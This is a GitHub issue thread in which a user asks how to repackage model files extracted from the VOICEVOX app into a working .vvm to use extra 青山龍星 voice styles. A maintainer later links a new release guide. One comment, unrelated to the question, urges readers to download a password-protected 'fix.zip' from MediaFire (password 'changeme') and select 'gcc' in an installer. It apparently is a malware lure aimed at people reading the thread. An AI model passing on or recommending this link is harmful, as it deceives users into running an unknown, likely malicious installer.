### ISSUE TITLE
製品版にある追加キャラクターの利用

### ISSUE THREAD

**Issue by motodimago** [VOICEVOX/voicevox_fat_resource#10]
## 質問の内容

現行配られているアプリのmetas.jsonと14.vvmまである[チェック用のモデル追加](https://github.com/VOICEVOX/voicevox_fat_resource/tree/%E3%83%81%E3%82%A7%E3%83%83%E3%82%AF%E7%94%A8%E3%81%AE%E3%83%A2%E3%83%87%E3%83%AB%E8%BF%BD%E5%8A%A0/
)ブランチ差分を取ると以下になりました。
("type": "frame_decode"以外)

```
Style ID 75 ずんだもん ヘロヘロ
Style ID 76 ずんだもん なみだめ
Style ID 81 青山龍星 熱血
Style ID 82 青山龍星 不機嫌
Style ID 83 青山龍星 喜び
Style ID 84 青山龍星 しっとり
Style ID 85 青山龍星 かなしみ
Style ID 86 青山龍星 囁き
Style ID 77 もち子さん 泣き
Style ID 78 もち子さん 怒り
Style ID 79 もち子さん 喜び
Style ID 80 もち子さん のんびり
Style ID 87 後鬼 人間（怒り）ver.
Style ID 88 後鬼 鬼ver.
```

以下の青山龍星のノーマル以外が使いたかったので、
```
Style ID 81 青山龍星 熱血
Style ID 82 青山龍星 不機嫌
Style ID 83 青山龍星 喜び
Style ID 84 青山龍星 しっとり
Style ID 85 青山龍星 かなしみ
Style ID 86 青山龍星 囁き
```

アプリのパッケージの内容を表示で、アプリの中を見るとmodelに16.vvmまであるので、0.vvm - 14.vvmと16.vvmを消して
15.vvmだけ残して、metas.jsonも上記だけにして再起動したあと、下記をspeakerを変えてAPIを叩いたところ15.vvmには81 - 86が入ってるようでした。（エラーではなく結果が帰ってきました）

なので`Vocievox/Contents/Resoureces/vv-engine/model/`より

```
d15.bin
pd15.bin
pi15.bin
metas.json
```
をコピーして、metas.jsonから81 - 86以外のデータを抜いたあとにmanifest.jsonを以下の内容で追加して
```
{
  "manifest_version": "0.0.0",
  "metas_filename": "metas.json",
  "decode_filename": "d15.bin",
  "predict_duration_filename": "pd15.bin",
  "predict_intonation_filename": "pi15.bin",
  "style_id_to_model_inner_id": {
    "81": 0,
    "82": 1,
    "83": 2,
    "84": 3,
    "85": 4,
    "86": 5
  }
}
```
zipで固めたあとvvmに拡張を変えて読み込ませたのですが、無効なモデルデータというエラーがでます。

こうしたら動くはず等あればヒントをいただけると嬉しいです。

## VOICEVOXのバージョン
取り出したVOICEVOXのバージョン
0.20.0

再生で使っているVOICEVOX COREのバージョン
0.15.0-preview

## OSの種類/ディストリ/バージョン
 
iOS 17.0.1
Flutter 3.24.0

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by motodimago** [comment]
@Hiroshiba ありがとうございます！それが一番嬉しいです！

**Comment by Hiroshiba** [comment]
@motodimago 
1年かかってしまったのですが、新しいキャラクターたちVVMをリリースがしました！
使い方が結構変わっているのでもしよかったらこちらをご参照ください！
https://github.com/VOICEVOX/voicevox_core/blob/main/docs/guide/user/usage.md
